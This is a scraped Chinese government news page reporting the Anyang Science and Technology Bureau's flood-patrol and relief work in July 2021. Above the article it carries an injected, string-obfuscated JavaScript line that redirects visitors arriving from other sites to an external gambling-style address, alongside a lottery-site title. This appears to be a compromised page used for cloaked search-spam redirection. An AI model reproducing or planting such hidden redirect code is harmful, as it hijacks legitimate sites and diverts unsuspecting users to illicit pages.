var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

安阳市科技局积极参加防汛抢险工作


发布日期:2021-07-26 16:12来源:安阳市科学技术局 阅读次数:

  7月22日上午10点,按照安阳市防汛指挥部指令,安阳市科技局党组书记、局长王延带领局领导肖剑锋、邵忠民、洪伟等25名防汛队员按时到达责任河堤段,按照要求做好了责任堤段巡堤查险、备勤值守各项工作。

  连日来,面对紧迫的防汛形势,安阳市科技局始终以高度的政治责任感和使命感切实肩负起科技系统在防汛抢险救灾中的重要职责。一是提前谋划市科技局城市防汛工作,购置防汛沙袋、铁锹、编织袋、救生衣、雨衣、木桩等各项防汛物资,及时组织将沙袋放置局责任堤段,并组建了由局系统67名党员干部组成的4个防汛应急分队,并积极参加全市防汛应急演练。二是局党组书记、局长王延和副局长邵忠民带头坚守岗位,深入一线,靠前指挥,多次冒雨来到洹河责任堤段,实地查看河段的地形、水位、坝体等。在防汛应急响应提升至1级后,安阳市科技局迅速安排部署洹河堤防责任段应急抢险准备工作,并协调督促全面排查局机关和系统各单位防汛工作和雨情受灾情况,全力以赴做好防汛工作。防汛应急队员时刻保持高度警醒,严格落实24小时防汛值班制度。三是由邵忠民副局长带队,共出动志愿者11人在局分包责任路段进行清淤和卫生清理工作,有效解决了暴雨对路面的影响。